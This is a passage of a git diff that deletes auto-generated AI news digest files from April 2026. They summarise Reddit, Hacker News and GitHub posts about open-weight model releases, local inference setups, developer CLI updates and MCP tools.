Here is github repo where I have added the [researc - ---- - -## [Is it possible for an open-source AI that you run at home to become as powerful as that of chatgpt and others at that level?](https://reddit.com/r/ChatGPT/comments/1smepps/is_it_possible_for_an_opensource_ai_that_you_run/) -*Reddit r/ChatGPT* | 15/04/2026 | Score: 1.00 -Tags: open_source - -> What would need to be true for someone to be able to run something that powerful entirely from home? Do they just need the correct weights? Assume that they don't need to do training (maybe some tech enthusiast does the training and just hands off the built model to people). Would storage space be a constraint? How much storage would they need? And how much RAM would they need? This is all for 1 person using it, not like the person would be serving an AI service out of their garage or something - ---- - -## [Lyra 2.0 : Explorable Generative 3D Worlds](https://reddit.com/r/StableDiffusion/comments/1smbyjf/lyra_20_explorable_generative_3d_worlds/) -*Reddit r/StableDiffusion* | 15/04/2026 | Score: 1.00 -Tags: developer_tool - -> Nvidia released **Lyra 2.0**, a framework for generating persistent, explorable 3D worlds at scale, from NVIDIA Research. Generating large-scale, complex environments is difficult for AI models. Current models often “forget” what spaces look like and lose track of movement over time, causing objects to shift, blur, or appear inconsistent. This prevents them from creating the reliable 3D environments required for downstream simulations. Lyra 2.0 solves these issues by: Maintaining per- - ---- - -## [[P] Built GPT-2, Llama 3, and DeepSeek from scratch in PyTorch - open source code + book](https://reddit.com/r/LocalLLaMA/comments/1sm82ze/p_built_gpt2_llama_3_and_deepseek_from_scratch_in/) -*Reddit r/LocalLLaMA* | 15/04/2026 | Score: 1.00 -Tags: open_source - -> I wrote a book that implements modern LLM architectures from scratch. 
The part most relevant to this sub: Chapter 3 takes GPT-2 and swaps exactly 4 things to get Llama 3.2-3B: 1. LayerNorm → RMSNorm 2. Learned positional encodings → RoPE 3. GELU → SwiGLU 4. Multi-Head Attention → Grouped-Query Attention Then loads Meta's real pretrained weights. Chapter 5 builds DeepSeek's full architecture: MLA with the absorption trick, decoupled RoPE, MoE with shared experts and fine-grained segmentation, - ---- - -## [Built GPT-2, Llama 3, and DeepSeek from scratch in PyTorch - open source code + book [p]](https://reddit.com/r/MachineLearning/comments/1sm75yf/built_gpt2_llama_3_and_deepseek_from_scratch_in/) -*Reddit r/MachineLearning* | 15/04/2026 | Score: 1.00 -Tags: open_source - -> I spent the past year implementing five LLM architectures from scratch in PyTorch and wrote a book documenting the process. What's covered: * Vanilla encoder-decoder transformer (English to Hindi translation) * GPT-2 (124M), loading real OpenAI pretrained weights * Llama 3.2-3B, showing the exact 4 component swaps from GPT-2 (RMSNorm, RoPE, SwiGLU, GQA), loading Meta's pretrained weights * KV cache mechanics, MQA, GQA * DeepSeek: Multi-Head Latent Attention with absorption trick and decoupled - ---- - diff --git a/data/digest-2026-04-16.md b/data/digest-2026-04-16.md deleted file mode 100644 index 7f5aad9..0000000 --- a/data/digest-2026-04-16.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-16** | 15 stories | Auto-generated from 396 archived stories - ---- - -## [Vercel CLI vercel@51.5.1 released](https://github.com/vercel/vercel/releases/tag/vercel%4051.5.1) -*GitHub Releases · Vercel CLI* | 16/04/2026 | Score: 0.92 -Tags: developer_tool, cli_tool, tool_update - -> ### Patch Changes - Improve Claude Code Vercel plugin install and update prompts across CLI commands. 
([#15921](https://github.com/vercel/vercel/pull/15921)) - Updated dependencies \[[`5219572d21a2ba4b49cc1c27d244c1ff5d76c591`](https://github.com/vercel/vercel/commit/5219572d21a2ba4b49cc1c27d244c1ff5d76c591), [`2babfa22946d80a92f1307a8d860a9039d695b09`](https://github.com/vercel/vercel/commit/2babfa22946d80a92f1307a8d860a9039d695b09), [`2babfa22946d80a92f1307a8d860a9039d695b09`](https://gi - ---- - -## [I got tired of copying/pasting between ChatGPT and X, so I built an extension that brings the AI directly into the timeline](https://reddit.com/r/ChatGPT/comments/1snf7bl/i_got_tired_of_copyingpasting_between_chatgpt_and/) -*Reddit r/ChatGPT* | 16/04/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> I use ChatGPT to help draft posts or brainstorm replies, but the workflow of copying tweets, pasting them into ChatGPT, asking it to reply, and then pasting it back into Twitter was driving me crazy. Also, it almost always sounds like a generic robot So, I built **Tweetback**, a Chrome/Edge/Firefox extension that brings your API key directly into the X/Twitter interface. I wanted to see how far I could push the AI to actually understand context and sound human. Here is what it can do: **"Clon - ---- - -## [anyone else notice labs are getting more secretive about their best models?](https://reddit.com/r/ChatGPT/comments/1sn599k/anyone_else_notice_labs_are_getting_more/) -*Reddit r/ChatGPT* | 16/04/2026 | Score: 1.00 -Tags: product_launch, open_source - -> something shifted recently and i can't stop thinking about it. the trend used to be: new model drops, blog post goes up, everyone gets access on day one. now it feels like the most capable stuff is quietly going behind walls with "restricted access" or gated research programs, while the public-facing releases are... fine, but clearly not the frontier. google dropped gemma 4 open-weight and it's genuinely good — MoE architecture, strong reasoning, apache license. 
meta's doing multimodal reasonin - ---- - -## [Mozilla Announces "Thunderbolt" As An Open-Source, Enterprise AI Client](https://reddit.com/r/LocalLLaMA/comments/1sn4ibj/mozilla_announces_thunderbolt_as_an_opensource/) -*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 -Tags: product_launch, open_source - -> Reddit r/LocalLLaMA — 4 upvotes, 3 comments - ---- - -## [Qwen3.6-35B-A3B released!](https://reddit.com/r/LocalLLaMA/comments/1sn3izh/qwen3635ba3b_released/) -*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> Meet Qwen3.6-35B-A3B:Now Open-Source!🚀🚀 A sparse MoE model, 35B total params, 3B active. Apache 2.0 license. \- Agentic coding on par with models 10x its active size \- Strong multimodal perception and reasoning ability \- Multimodal thinking + non-thinking modes Efficient. Powerful. Versatile. Blog:https://qwen.ai/blog?id=qwen3.6-35b-a3b Qwen Studio:chat.qwen.ai HuggingFace:https://huggingface.co/Qwen/Qwen3.6-35B-A3B ModelScope:https://modelscope.cn/models/Qwen/Qwen3.6-35B-A3B - ---- - -## [Built a visual memory layer for Claude — see what Claude remembers about your projects (open source, free, WIP)](https://reddit.com/r/ClaudeAI/comments/1smzaxb/built_a_visual_memory_layer_for_claude_see_what/) -*Reddit r/ClaudeAI* | 16/04/2026 | Score: 1.00 -Tags: mcp, open_source - -> Claude already has memory — but it's a black box. You can't see what it knows, what decisions were made, or how your project is progressing. Dendrite makes Claude's memory visible. How it works: - Claude writes structured memory slices via MCP (decisions, observations, tasks, open questions) - You see everything in a searchable 3-pane reader - Set your own preferences that Claude pulls from on every session - Track project progress, o - ---- - -## [Built an political benchmark for LLMs. KIMI K2 can't answer about Taiwan (Obviously). GPT-5.3 refuses 100% of questions when given an opt-out. 
[P]](https://reddit.com/r/MachineLearning/comments/1smqsbu/built_an_political_benchmark_for_llms_kimi_k2/) -*Reddit r/MachineLearning* | 16/04/2026 | Score: 1.00 -Tags: api_update, open_source - -> I spent the few days building a benchmark that maps where frontier LLMs fall on a 2D political compass (economic left/right + social progressive/conservative) using 98 structured questions across 14 policy areas. I tested GPT-5.3, Claude Opus 4.6, and KIMI K2. The results are interesting. **The repo is fully open-source -- run it yourself on any model with an API:** [https://github.com/dannyyaou/llm-political-eval](https://github.com/dannyyaou/llm-political-eval) **The headline finding - ---- - -## [Keycard – inject API keys into subprocesses, never touch shell env](https://www.keycard.studio/) -*Hacker News* | 16/04/2026 | Score: 0.97 -Tags: api_update, cli_tool - ---- - -## [I turned my MacBook notch into a live Claude Code dashboard](https://reddit.com/r/ClaudeAI/comments/1smm0mo/i_turned_my_macbook_notch_into_a_live_claude_code/) -*Reddit r/ClaudeAI* | 16/04/2026 | Score: 0.91 -Tags: api_update, cli_tool - -> Notch Pilot lives in the MacBook notch (no menu bar icon, no dock icon) and shows: * Live 5-hour session % + weekly limits — the exact numbers from your Claude account page, pulled from the same oauth/usage endpoint Claude Code uses. * Permission prompts rendered inline — shell commands get a code block, file edits get a red/green diff, URLs get parsed. Deny / Allow / Always allow, with "always allow" writing to \~/.claude/settings.json. * Every live session at a glance — project, model, uptime - ---- - -## [OpenClaw v2026.4.15 released](https://github.com/openclaw/openclaw/releases/tag/v2026.4.15) -*GitHub Releases · OpenClaw* | 16/04/2026 | Score: 0.84 -Tags: developer_tool, cli_tool - -> ### Changes - Anthropic/models: default Anthropic selections, `opus` aliases, Claude CLI defaults, and bundled image understanding to Claude Opus 4.7. 
- Google/TTS: add Gemini text-to-speech support to the bundled `google` plugin, including provider registration, voice selection, WAV reply output, PCM telephony output, and setup/docs guidance. (#67515) Thanks @barronlroth. ### Fixes - Agents/skills: sort prompt-facing `available_skills` entries by skill name after merging sources so `skills. - ---- - -## [Crush v0.59.0 released](https://github.com/charmbracelet/crush/releases/tag/v0.59.0) -*GitHub Releases · Crush* | 16/04/2026 | Score: 0.84 -Tags: cli_tool, tool_update - -> ## Changelog ### New! * 3773b23cb44afc4567d892f01c41c8dc62556ca0: feat(shell): add jq as a bash builtin + a jq skill for it (@meowgorithm) * b37649e45299d426aeae73a54efc0d1155fb5c91: feat(ui): add skills discovery status to sidebar and landing page (#2384) (@huaiyuWangh) * e8f5e2025d2401ffe06123c42226f3b7a20abe3a: feat: show progress bar on rio terminal (#2624) (@andreynering) ### Fixed * f546a071891c4ced02c832ff1789534df2874bda: fix(prompt): remind coder to follow `` format on comm - ---- - -## [Qwen3.6-35B is worse at tool use and reasoning loops than 3.5?](https://reddit.com/r/LocalLLaMA/comments/1sni4c1/qwen3635b_is_worse_at_tool_use_and_reasoning/) -*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 -Tags: api_update - -> Been running the new model entire evening in different quants and coding tasks with OpenCode. Used oMLX and LM Studio. Used recommended settings for precise tasks (temp 0.6, top-k 20, etc) and OpenCode agent. So far my findings is that the model goes into infinite reasoning loops more often than 3.5, and I sometimes see failed tool calls. The latter could be parser bugs, but the former is the model itself. It’s ok on basic apps, but really struggles to move ahead on something more complex like - ---- - -## [PSA: Qwen3.6 ships with preserve_thinking. 
Make sure you have it on.](https://reddit.com/r/LocalLLaMA/comments/1sne4gh/psa_qwen36_ships_with_preserve_thinking_make_sure/) -*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 -Tags: tool_update - -> I had previously posted [here about a fix to their 3.5 template ](https://www.reddit.com/r/LocalLLaMA/comments/1sg076h/i_tracked_a_major_cache_reuse_issue_down_to_qwen/)to help resolve the KV cache invalidation issue from their template. A lot of you found it useful. Qwen 3.6 now addresses this with a new preserve\_thinking flag. From their [model page:](https://huggingface.co/Qwen/Qwen3.6-35B-A3B) >`please use "preserve_thinking": True instead of "chat_template_kwargs": {"preserve_thinking - ---- - -## [Google, please just open source Imagen (2022), Gemini 1.0 Nano and Gemini 1.0 Pro. You have nothing to lose at this point.](https://reddit.com/r/LocalLLaMA/comments/1sncslc/google_please_just_open_source_imagen_2022_gemini/) -*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 -Tags: open_source - -> Ok, so imagen (the original one from 2022, not imagen 3/4) should be open source. The gemini 1.0 nano model and the gemini 1.0 pro models should be open source. xAI already open-sourced grok 1, but Google???????? at this point you should open source this Google if you seeing this (prob. not) please open source it in I/O 2026 Edit: please open source also palm 2 unicorn and bison, geminii 3.1 destroys it - ---- - -## [Replaced an LLM's text generation head with one that emits raw machine opcodes. Here are my findings](https://reddit.com/r/LocalLLaMA/comments/1snbyh8/replaced_an_llms_text_generation_head_with_one/) -*Reddit r/LocalLLaMA* | 16/04/2026 | Score: 1.00 -Tags: agent_tool - -> Follow-up to [my previous post](https://www.reddit.com/r/LocalLLaMA/comments/1sm076z/i_cant_stop_thinking_about_this_why_are_we_making/) about why AI agents should not control machines through text. The idea: every AI agent today generates human text, parses it, then executes it. 
That's like controlling a robot arm by dictating English. Tesla FSD replaced that pattern. Cameras go in, steering commands come out, no text in between. Can we do the same for software? Skip the text, emit machine ins - ---- - diff --git a/data/digest-2026-04-17.md b/data/digest-2026-04-17.md deleted file mode 100644 index b4320b3..0000000 --- a/data/digest-2026-04-17.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-17** | 15 stories | Auto-generated from 370 archived stories - ---- - -## [Crush v0.60.0 released](https://github.com/charmbracelet/crush/releases/tag/v0.60.0) -*GitHub Releases · Crush* | 17/04/2026 | Score: 1.00 -Tags: api_update, product_launch, tool_update - -> # Secret release You're not supposed to read through the changelog below. ## Changelog ### New! * ea86101bf6c61ee05ca3e887ea65d2f5ff9e68d7: feat(hyper): use openai-compatible endpoint for hyper (#2640) (@andreynering) ---
          Verifying the artifacts First, download the [`checksums.txt` file](https://github.com/charmbracelet/crush/releases/download/v0.60.0/checksums.txt) and the [`checksums.txt.sigstore.json` file](https://github.com/charmbracelet/crush/ - ---- - -## [Adapt: open-source memory that rewrites its own structure when your data surprises it](https://reddit.com/r/LocalLLaMA/comments/1so002u/adapt_opensource_memory_that_rewrites_its_own/) -*Reddit r/LocalLLaMA* | 17/04/2026 | Score: 1.00 -Tags: api_update, open_source, developer_tool - -> TypeScript library I've been building. The thing I want feedback on: when the memory keeps dismissing data it shouldn't, or queries keep coming back empty, it restructures itself;splits overloaded learners, merges redundant ones, grows new ones for domains nobody configured. Works with any Vercel AI SDK provider, so Ollama / LM Studio / llama.cpp plus hosted. Observe and synthesize are separate LLM calls, so you can run a 7B for observe (the high-volume path) and a bigger model for s - ---- - -## [Anthropic's AI protocol has critical flaw affecting 200,000 servers](https://reddit.com/r/ClaudeAI/comments/1snx2nw/anthropics_ai_protocol_has_critical_flaw/) -*Reddit r/ClaudeAI* | 17/04/2026 | Score: 1.00 -Tags: api_update, mcp, open_source - -> https://www.infosecurity-magazine.com/news/systemic-flaw-mcp-expose-150/ Security researchers at OX Security disclosed on Tuesday what they describe as a critical, systemic vulnerability in Anthropic's Model Context Protocol, an open-source standard that allows AI models to connect to external data sources and systems. 
The flaw could enable arbitrary command execution on any vulnerable system, potentially exposing sensitive user data, internal databases, API keys, and chat histories across more - ---- - -## [OpenAI Codex Just Got Its Biggest Update Yet](https://reddit.com/r/ChatGPT/comments/1sno26n/openai_codex_just_got_its_biggest_update_yet/) -*Reddit r/ChatGPT* | 17/04/2026 | Score: 1.00 -Tags: developer_tool, cli_tool, agent_tool - -> OpenAI says Codex now works in the app, IDE, terminal, web, GitHub, iOS, and Slack. Recent upgrades bundled a new GPT-5.3-Codex model for agentic coding, a rebuilt CLI, an IDE extension for VS Code-compatible editors, faster cloud task performance via container caching, automated code review, an in-app browser for rendered pages, and computer use for macOS apps. April 2026 added three more shifts: a token-based credit billing model, a new $100 Pro tier with up to 10x Plus usage, and - ---- - -## [[Resource] Anima Style Explorer: A free web tool for ComfyUI styles + Open Source MooshieUI Desktop Client](https://reddit.com/r/StableDiffusion/comments/1snkume/resource_anima_style_explorer_a_free_web_tool_for/) -*Reddit r/StableDiffusion* | 17/04/2026 | Score: 1.00 -Tags: open_source, tool_update - -> I wanted to share a project I have been building for the community called Anima. It is a completely free web-based style explorer designed to help you discover and visualize different aesthetic prompts and configurations for your Stable Diffusion generations without guesswork. Web Version: [https://anima.mooshieblob.com/](https://anima.mooshieblob.com/) **MooshieUI Integration (Open Source)** For those who prefer a local workflow, I have also integrated this into MooshieUI. This is a custom, - ---- - -## [How to Implement Karpathy's LLM Knowledge Base. 
Full Guide](https://reddit.com/r/ChatGPT/comments/1so334n/how_to_implement_karpathys_llm_knowledge_base/) -*Reddit r/ChatGPT* | 17/04/2026 | Score: 0.98 -Tags: api_update, developer_tool - -> karpathy introduced his LLM Knowledge base Wiki last week. We've been quietly doing a version of this for months at our Org, but his write-up made me realize how much further you can take it with the right setup. **the core idea**: using LLM to compile and maintain knowledge. **you feed source documents** \- articles, papers, sdk references, repos into a raw directory. the model incrementally builds a wiki from them. markdown files, summaries, backlinks, categorized by concept. the llm writes - ---- - -## [Gemini CLI v0.38.2 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.2) -*GitHub Releases · Gemini CLI* | 17/04/2026 | Score: 0.92 -Tags: cli_tool, tool_update - -> ## What's Changed * fix(patch): cherry-pick 14b2f35 to release/v0.38.1-pr-24974 to patch version v0.38.1 and create version 0.38.2 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25585 **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.38.1...v0.38.2 - ---- - -## [Vercel CLI vercel@51.7.0 released](https://github.com/vercel/vercel/releases/tag/vercel%4051.7.0) -*GitHub Releases · Vercel CLI* | 17/04/2026 | Score: 0.84 -Tags: api_update, cli_tool - -> ### Minor Changes - [detect-services] If a vercel.toml exists, update the vercel.toml ([#15895](https://github.com/vercel/vercel/pull/15895)) - Use correct filename in messages when config file is not vercel.json ([#15893](https://github.com/vercel/vercel/pull/15893)) - [services] move Python workers to v2beta triggers with private routing ([#15920](https://github.com/vercel/vercel/pull/15920)) ### Patch Changes - Include `action` and `resource` fields from API 403 responses in non- - ---- - -## [Vercel CLI vercel@51.6.1 released](https://github.com/vercel/vercel/releases/tag/vercel%4051.6.1) 
-*GitHub Releases · Vercel CLI* | 17/04/2026 | Score: 0.84 -Tags: cli_tool, tool_update - -> ### Patch Changes - Updated dependencies \[[`055f6239a4fe763b9f3b33cfbb5baa2e0e214767`](https://github.com/vercel/vercel/commit/055f6239a4fe763b9f3b33cfbb5baa2e0e214767)]: - @vercel/build-utils@13.18.0 - @vercel/backends@0.1.0 - @vercel/python@6.34.0 - @vercel/elysia@0.1.68 - @vercel/express@0.1.78 - @vercel/fastify@0.1.71 - @vercel/go@3.5.0 - @vercel/h3@0.1.77 - @vercel/hono@0.2.71 - @vercel/hydrogen@1.3.6 - @vercel/koa@0.1.51 - ---- - -## [CadQuery is an open-source Python library for building 3D CAD models](https://cadquery.github.io/) -*Hacker News* | 15/04/2026 | Score: 0.84 -Tags: open_source, developer_tool - ---- - -## [Qwen3.6 GGUF is so good for debugging.](https://reddit.com/r/LocalLLaMA/comments/1sofcqv/qwen36_gguf_is_so_good_for_debugging/) -*Reddit r/LocalLLaMA* | 17/04/2026 | Score: 1.00 -Tags: api_update - -> using unsloth dynamic quant on 16GB vram + 32GB dram. 200k q8\_0 kv cache (context window) - ---- - -## [Intel Arc Pro B70 Open-Source Linux Performance Against NVIDIA RTX & AMD Radeon AI PRO Review](https://reddit.com/r/LocalLLaMA/comments/1soe0nm/intel_arc_pro_b70_opensource_linux_performance/) -*Reddit r/LocalLLaMA* | 17/04/2026 | Score: 1.00 -Tags: open_source - -> The R9700 is about 30% more than the B70, but it's more than 30% better. Overall, I rather have a R9700 than a B70. - ---- - -## [Trying to Run LTX2.3 locally but getting an error](https://reddit.com/r/StableDiffusion/comments/1sodw5o/trying_to_run_ltx23_locally_but_getting_an_error/) -*Reddit r/StableDiffusion* | 17/04/2026 | Score: 1.00 -Tags: api_update - -> I'm pretty new to all of this, but I thought that the cool thing about LTX 2.3 was that you are able to do image and video generation locally on your own hardware. But it's still connected to the API key that I created which makes it think I'm still trying to use it through the cloud. 
I tried switching the model to something that would make it generate locally but I guess that wasn't the solution? It was a 25 GB download so I thought that was the answer but now I'm stumped. Can someone explain h - ---- - -## [Claude Design just launched and Figma dropped 4.26% in a single day, we are witnessing history in real time](https://reddit.com/r/ClaudeAI/comments/1so6z2t/claude_design_just_launched_and_figma_dropped_426/) -*Reddit r/ClaudeAI* | 17/04/2026 | Score: 1.00 -Tags: tool_update - -> I genuinely cannot believe what I'm watching unfold today Anthropic dropped Claude Design this morning , a tool that lets anyone describe what they want and get back a full website, landing page, or presentation. No design skills needed and No Figma subscription. Just... talk to it And the market reacted instantly. Figma stock is down $0.86 (4.26%) today alone. Adobe, Wix, GoDaddy all bled too. Anthropic's own CPO literally resigned from Figma's board three days ago. The writing was on the wal - ---- - -## [Fastest image to image model](https://reddit.com/r/StableDiffusion/comments/1so6um1/fastest_image_to_image_model/) -*Reddit r/StableDiffusion* | 17/04/2026 | Score: 1.00 -Tags: api_update - -> Does anybody know a platform that can deliver **image-to-image** responses in their **API** in less than **7** seconds? I already tried **Nano Banana**, but it takes about **16** seconds or more. 
- ---- - diff --git a/data/digest-2026-04-18.md b/data/digest-2026-04-18.md deleted file mode 100644 index 9c2b33f..0000000 --- a/data/digest-2026-04-18.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-18** | 15 stories | Auto-generated from 256 archived stories - ---- - -## [[Update] GHOST v2.1: Full Native Windows Support is Live.](https://reddit.com/r/LocalLLaMA/comments/1sp7yhz/update_ghost_v21_full_native_windows_support_is/) -*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> FOR THE UNINITIATED: GHOST is an open source environment manager that breaks the NVIDIA monopoly. It allows you to run high performance AI models on AMD hardware by automatically injecting ZLUDA and ROCm layers into your Windows environment. No Linux, no complex WSL2 setups, and no driver hacking required. KEY FEATURES Full Windows Native Support: Runs directly in PowerShell with a hardened virtualization layer. Auto Hardware Mapping: Scans your system and spoofs the exact RDNA architecture - ---- - -## [easyaligner: Forced alignment with GPU acceleration and flexible text normalization (compatible with all w2v2 models on HF Hub) [P]](https://reddit.com/r/MachineLearning/comments/1soyqfw/easyaligner_forced_alignment_with_gpu/) -*Reddit r/MachineLearning* | 18/04/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> https://preview.redd.it/f4d5krhkjyvg1.png?width=1020&format=png&auto=webp&s=11310f377b22abbe3dd110cc7d362ba8aae35f8d I have built [`easyaligner`](https://kb-labb.github.io/easyaligner/), a forced alignment library designed to be performant and easy to use. Having worked with preprocessing hundreds of thousands of hours of audio and text for training speech-to-text models, I found that the available open source forced alignment libraries often missed some convenience features. 
For o - ---- - -## [We’re proud to open-source LIDARLearn [R] [D] [P]](https://reddit.com/r/MachineLearning/comments/1sou5u1/were_proud_to_opensource_lidarlearn_r_d_p/) -*Reddit r/MachineLearning* | 18/04/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> It’s a unified PyTorch library for 3D point cloud deep learning. To our knowledge, it’s the first framework that supports such a large collection of models in one place, with built-in cross-validation support. It brings together 56 ready-to-use configurations covering supervised, self-supervised, and parameter-efficient fine-tuning methods. You can run everything from a single YAML file with one simple command. One of the best features: after training, you can automatically generate a publica - ---- - -## [Qwen 3.6 vs 6 other models across 5 agent frameworks on M3 Ultra](https://reddit.com/r/LocalLLaMA/comments/1sojag2/qwen_36_vs_6_other_models_across_5_agent/) -*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> I benchmarked Qwen 3.6, Qwen 3.5, and 5 other models across 5 agent frameworks on Apple Silicon — here's the full compatibility matrix **Hardware:** Apple M3 Ultra, 256GB unified memory **Frameworks tested:** Hermes Agent (64K stars), PydanticAI, LangChain, smolagents (HuggingFace), OpenClaude/Anthropic SDK **Models tested:** Qwen 3.6 35B (brand new), Qwen 3.5 35B, Qwopus 27B, Qwen 3.5 27B, Llama 3.3 70B, DeepSeek-R1 32B, Gemma 4 26B # The Agent Compatibility Matrix This is the part I wish - ---- - -## [gpt can now control your entire computer like a humain](https://reddit.com/r/ChatGPT/comments/1soht46/gpt_can_now_control_your_entire_computer_like_a/) -*Reddit r/ChatGPT* | 18/04/2026 | Score: 1.00 -Tags: cli_tool, agent_tool - -> Hey everyone, I built something called AriaOS and just open-sourced it. The idea is simple: instead of running an agent in a terminal session that only sees text, I gave it its own isolated Debian VM with computer use. 
It can see the screen, move the mouse, click, type, scroll, open apps, work with files, and operate inside a contained environment. What made the project interesting is that: I didn’t want to rely only on visual automation. I built a hybrid system that combines high-speed local - ---- - -## [ChatGPT kept hallucinating my Factorio bottlenecks. So I built an MCP that reads your saves.](https://reddit.com/r/ChatGPT/comments/1sp7824/chatgpt_kept_hallucinating_my_factorio/) -*Reddit r/ChatGPT* | 18/04/2026 | Score: 0.94 -Tags: mcp, open_source - -> You've probably asked ChatGPT a question about a game you're playing -- "is this item worth keeping in D2R," "why is my Factorio base bottlenecked," "how does this card interaction work in Magic," -- and the answer was hallucinated. The training data is stale, and the gaps get filled with plausible-sounding nonsense. I built **Savecraft** to fix that. It's an open-source MCP server that reads your actual game saves and feeds ChatGPT real game data instead of letting it guess. For example: * * - ---- - -## [Goose v1.31.0 released](https://github.com/aaif-goose/goose/releases/tag/v1.31.0) -*GitHub Releases · Goose* | 17/04/2026 | Score: 0.76 -Tags: github_release, tool_update - -> New version of Goose available. - ---- - -## [Qwen 3.6 + vLLM + Docker + 2x RTX 3090 setup, working great!](https://reddit.com/r/LocalLLaMA/comments/1sp761q/qwen_36_vllm_docker_2x_rtx_3090_setup_working/) -*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 -Tags: api_update - -> Our nonprofit association has an AI server with 2x RTX 3090 and I finally switched over to vLLM to get better performance for multiple users. 
Here's my docker compose file: services: vllm: image: vllm/vllm-openai:latest container_name: vllm deploy: resources: reservations: devices: - driver: nvidia count: all capabilities: [gpu] environment: - VLLM_API_KEY - ---- - -## [Are you guys actually using local tool calling or is it a collective prank?](https://reddit.com/r/LocalLLaMA/comments/1sp631h/are_you_guys_actually_using_local_tool_calling_or/) -*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 -Tags: cli_tool - -> I don't know if it's something I am doing horribly wrong or what, but running Open WebUI w/ Terminal on Docker with the models on LM Studio and I am starting to think the community keeps praising the tool calling feature just to cope lol Qwen3.5 27B, 35B, Gemma4 26B, Qwen3.6 35B, GPS-OSS 20B - I have tried them all using the recommended parameters from Unsloth and asking them to create a single file with data is very finicky **when** it works. Today with Gemma4, it kept assuring me it cr - ---- - -## [Lore 0.2.0 - the open source local knowledge management app is now much smarter, with a visible reasoning stream, and non-destructive embedding migration](https://reddit.com/r/LocalLLaMA/comments/1sp5d6l/lore_020_the_open_source_local_knowledge/) -*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 -Tags: open_source - -> Quick update on Lore, the local-first memory app I posted here around v0.1.0. It's a tray app: global shortcut → chat bar → save or recall in natural language. Everything stays on your machine. v0.2.0 highlights: \- ThinkingStream: you watch the agent's reasoning, retrieval, and tool calls in real time. \- Embedding-model migration is now non-destructive. 
You can swap from nomic-embed to mxbai-embed (or whatever) without losing data; the new embeddingTableSync rebuilds in place - ---- - -## [EditAnything IC-LoRA - LTX-2.3](https://reddit.com/r/StableDiffusion/comments/1sp03jq/editanything_iclora_ltx23/) -*Reddit r/StableDiffusion* | 18/04/2026 | Score: 1.00 -Tags: tool_update - -> This model was trained on **8,000 video pairs**, and training is still ongoing for a few thousand more steps. It is still **experimental**, not trained with a fully professional production target, and the model may be updated unexpectedly as new checkpoints. The current goal is not final polished production quality, but to explore: * edit-anything behavior * prompt-following * inference tradeoffs * synthetic dataset building, especially for **style data** The model was trained around four mai - ---- - -## [Melodic Brotherhood - I Just Need to Know (video generated with open source tools)](https://reddit.com/r/StableDiffusion/comments/1soz67p/melodic_brotherhood_i_just_need_to_know_video/) -*Reddit r/StableDiffusion* | 18/04/2026 | Score: 1.00 -Tags: open_source - -> Made a '96-'98 Anthem House /Eurodance music video. The images are generated with ZIT and ZIB, Flux Klein 9B and Qwen Image Edit 2511. Video is Wan 2.2, SCAIL (for the dancing), and LTX 2 (for the lip synced singing). Only non-open source thing is the music, which is Suno. - ---- - -## [Has PP improved enough on m5 max to go for 128gb?](https://reddit.com/r/LocalLLaMA/comments/1soz4b4/has_pp_improved_enough_on_m5_max_to_go_for_128gb/) -*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 -Tags: agent_tool - -> Few years ago I got caught up in the hype on here for the m1 max 64gb, everyone saying it was great for local, but the reality was pp sucked so bad it wasn't worth using on anything but tiny models. Thinking of upgrading to m5 max, just wondering what the sweet spot is for ram? 
Can you actually utilise the full 128gb and still have acceptable pp speed for large ctx for agentic coding? - ---- - -## [Built a program to track logistical intelligence using satellite data [P]](https://reddit.com/r/MachineLearning/comments/1sov7hr/built_a_program_to_track_logistical_intelligence/) -*Reddit r/MachineLearning* | 18/04/2026 | Score: 1.00 -Tags: tool_update - -> Hey guys, I've been workin on something new to track logistical activity near military bases and other hubs. The core problem is that Google maps isn't updated that frequently even with sub meter res and other map providers such as maxar are costly for osint analysts. But there's a solution. Drish detects moving vehicles on highways using Sentinel-2 satellite imagery. The trick is physics. Sentinel-2 captures its red, green, and blue bands about 1 second apart. Everything stationary looks nor - ---- - -## [Is there something like SETI for training open source models?](https://reddit.com/r/LocalLLaMA/comments/1sov5lb/is_there_something_like_seti_for_training_open/) -*Reddit r/LocalLLaMA* | 18/04/2026 | Score: 1.00 -Tags: open_source - -> Some years ago there were initiatives for distributed computing networks like SETI or even Fold at Home for proteins I think. Would it be possible that the community could make a network like this for training open source models with non-problematic licenses and more than only open weights? Is that a stupid idea? 
- ---- - diff --git a/data/digest-2026-04-19.md b/data/digest-2026-04-19.md deleted file mode 100644 index 94cf540..0000000 --- a/data/digest-2026-04-19.md +++ /dev/null @@ -1,119 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-19** | 15 stories | Auto-generated from 579 archived stories - ---- - -## [whats the best harness/app to use my llm with?](https://reddit.com/r/LocalLLaMA/comments/1spr7r4/whats_the_best_harnessapp_to_use_my_llm_with/) -*Reddit r/LocalLLaMA* | 19/04/2026 | Score: 1.00 -Tags: mcp, developer_tool - -> would be nice if i could just use claude desktop app like i can with claude code/extension but sadly it doesnt work with the app looking for something with a nice UI/UX, MCP, built in html/doc preview, research, other features etc. basically something that could replace claude desktop/gemini in terms of what features it has with my local model. seeing things like hermes? cherry studio? good ol LM studio? - ---- - -## [I tested 8 LLMs as tabletop GMs - a 27B model beat the 405B on narrative 